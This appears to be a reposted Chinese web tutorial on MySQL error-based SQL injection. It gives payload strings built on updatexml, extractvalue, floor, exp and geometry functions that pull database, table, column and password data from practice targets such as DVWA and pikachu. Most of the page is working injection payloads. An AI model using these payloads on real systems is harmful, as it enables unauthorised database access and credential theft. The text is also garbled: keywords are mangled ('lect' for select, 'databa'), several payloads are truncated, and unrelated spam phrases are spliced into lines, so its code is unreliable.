SQL注入报错注入函数

更新时间:2023-06-19 07:57:24 阅读: 评论:0

SQL注⼊报错注⼊函数
前⾔
报错注⼊的前提是当语句发⽣错误时,错误信息被输出到前端。其漏洞原因是由于开发⼈员在开发程序时使⽤了print_r
(),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执⾏后⾯的语句。常⽤报错函数
updatexml()        是mysql对xml⽂档数据进⾏查询和修改的xpath函数
extractvalue()      是mysql对xml⽂档数据进⾏查询的xpath函数
floor()            mysql中⽤来取整的函数
梦见白发exp()              此函数返回e(⾃然对数的底)指数X的幂值
⽤法详解
updatexml()函数
updatexml()函数的作⽤就是改变(查找并替换)xml⽂档中符合条件的节点的值
语法:updatexml(xml_document,XPthstring,new_value)
第⼀个参数是字符串string(XML⽂档对象的名称)
第⼆个参数是指定字符串中的⼀个位置(Xpath格式的字符串)
第三个参数是将要替换成什么,string格式
Xpath定位必须是有效的,否则则会发⽣错误。我们就能利⽤这个特性爆出我们想要的数据
实例
注册就是往数据库⾥添加数据,inrt。
书包网电子书
在⽤户处输⼊单引号 报错
初中数学人教版inrt into ur(name,password,x,phone,address1,address2) value('xxx',123,1,2,3,4)可以在xxx处对单引号闭合,爆出我们想要的数据
id=1' or updatexml(0,concat(0x7e,lect databa()),1)'
闭合单引号使语句逃逸出来,之后重新构造语句查询,爆破出库名为:"pikachu"
分析过程
当输⼊payload
id=1' or updatexml(0,concat(0x7e,lect databa()),1)or'
后端会被拼接为
inrt into ur(name,password,x,phone,address1,address2) value('' or updatexml(1,concat(0x7e,databa()),0) or '',
表名列名字段和正常查询⼀样只是换了个位置
利⽤过程
库名
1'and updatexml(1,concat(0x7e,databa(),0x7e,ur(),0x7e,@@datadir),1)#
表名
1' and updatexml(1,concat(0x7e,(lect group_concat(table_name) from information_schema.tables where table_schema=databa()),0x7e),1) #
查表信息(假定有⼀个urs表,库名为dvwa
1' and updatexml(1,concat(0x7e,(lect group_concat(column_name) from lumns where table_schema='dvwa' and table_name='u 查字段值(假设字段名为last_name(dvwa.urs意思为调⽤dvwa库的urs表)
1' and updatexml(1,concat(0x7e,(lect group_concat(first_name,0x7e,last_name) from dvwa.urs)),1) #
extractvalue()函数
extractvalue()函数的作⽤是从⽬标xml中返回包含所查询值的字符串
村干部辞职报告extractvalue (XML_document, XPath_string);
第⼀个参数:XML_document是String格式,为XML⽂档对象的名称,⽂中为doc
第⼆个参数:XPath_string(Xpath格式的字符串),Xpath定位必须是有效的,否则会发⽣错误
构造payload
id=1' or extracrvalue(0,concat(0x7e,databa())) or '
注意xpath回显只有⼀位使⽤limit函数逐个爆,且最长为32位,超过32位爆不了
利⽤过程
当前库
1' and extractvalue(1,concat(0x7e,ur(),0x7e,databa())) #
当前表
1' and extractvalue(1,concat(0x7e,(lect group_concat(table_name) from information_schema.table
s where table_schema=databa()))) #
表信息(假设表为urs
1' and extractvalue(1,concat(0x7e,(lect group_concat(column_name) from lumns where table_schema=databa() and table_na 字段值(字段为ur_id,first_name,last_name,(dvwa.urs意思为调⽤dvwa库的urs表)
1' and extractvalue(1,concat(0x7e,(lect group_concat(ur_id,0x7e,first_name,0x3a,last_name) from dvwa.urs))) #
floor()函数
隋子辉floor()是mysql的⼀个取整函数
男人不爱你的表现库名
id=1' union lect count(*),concat(floor(rand(0)*2),databa()) x from information_schema.schemata group by x #
熊猫拼音表名(库为dvwa,通过修改 limit 0,1值递增查表, limit 1,1、limit 2,1
id=1' union lect count(*),concat(floor(rand(0)*2),0x3a,(lect concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)字段名(库:dvwa,表:urs
id=1' union lect count(*),concat(floor(rand(0)*2),0x3a,(lect concat(column_name) from lumns where table_name='urs' and ta 字段值(字段值:ur,password(dvwa.urs意思为调⽤dvwa库urs表
id=1' union lect count(*),concat(floor(rand(0)*2),0x3a,(lect concat(ur,0x3a,password) from dvwa.urs limit 0,1)) x from information_schema.schem
exp()函数
当传递⼀个⼤于709的值时,函数exp()就会引起⼀个溢出错误。
库名
id=1' or exp(~(SELECT * from(lect databa())a)) or '
表名(库名:pikachu
id=1' or exp(~(lect * from(lect group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')a)) or '
字段名(表名:urs
id=1' or exp(~(lect * from(lect group_concat(column_name) from lumns where table_name = 'urs')a)) or '
字段值(字段名:password,表名:urs
id=1' or wzp(~(lect * from(lect password from urs limit 0,1)a)) or '
12种报错注⼊函数
1、通过floor报错,注⼊语句如下:
and (lect 1 from (lect count(*),concat(ur(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2、通过extractvalue报错,注⼊语句如下:
针灸治疗
and (extractvalue(1,concat(0x7e,(lect ur()),0x7e)));
3、通过updatexml报错,注⼊语句如下:
and (updatexml(1,concat(0x7e,(lect ur()),0x7e),1));
4、通过exp报错,注⼊语句如下:
and exp(~(lect * from (lect ur () ) a) );
5、通过join报错,注⼊语句如下:
lect * from(lect * from mysql.ur ajoin mysql.ur b)c;
6、通过NAME_CONST报错,注⼊语句如下:
and exists(lectfrom (lectfrom(lectname_const(@@version,0))a join (lect name_const(@@version,0))b)c);
7、通过GeometryCollection()报错,注⼊语句如下:
and GeometryCollection(()lect *from(lect ur () )a)b );
8、通过polygon ()报错,注⼊语句如下:
and polygon (()lect * from(lect ur ())a)b );
9、通过multipoint ()报错,注⼊语句如下:
and multipoint (()lect * from(lect ur() )a)b );
10、通过multlinestring ()报错,注⼊语句如下:
and multlinestring (()lect * from(lectur () )a)b );

本文发布于:2023-06-19 07:57:24,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/fan/82/989491.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:语句   查询   函数   报错
相关文章
留言与评论(共有 0 条评论)
   
验证码:
推荐文章
排行榜
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图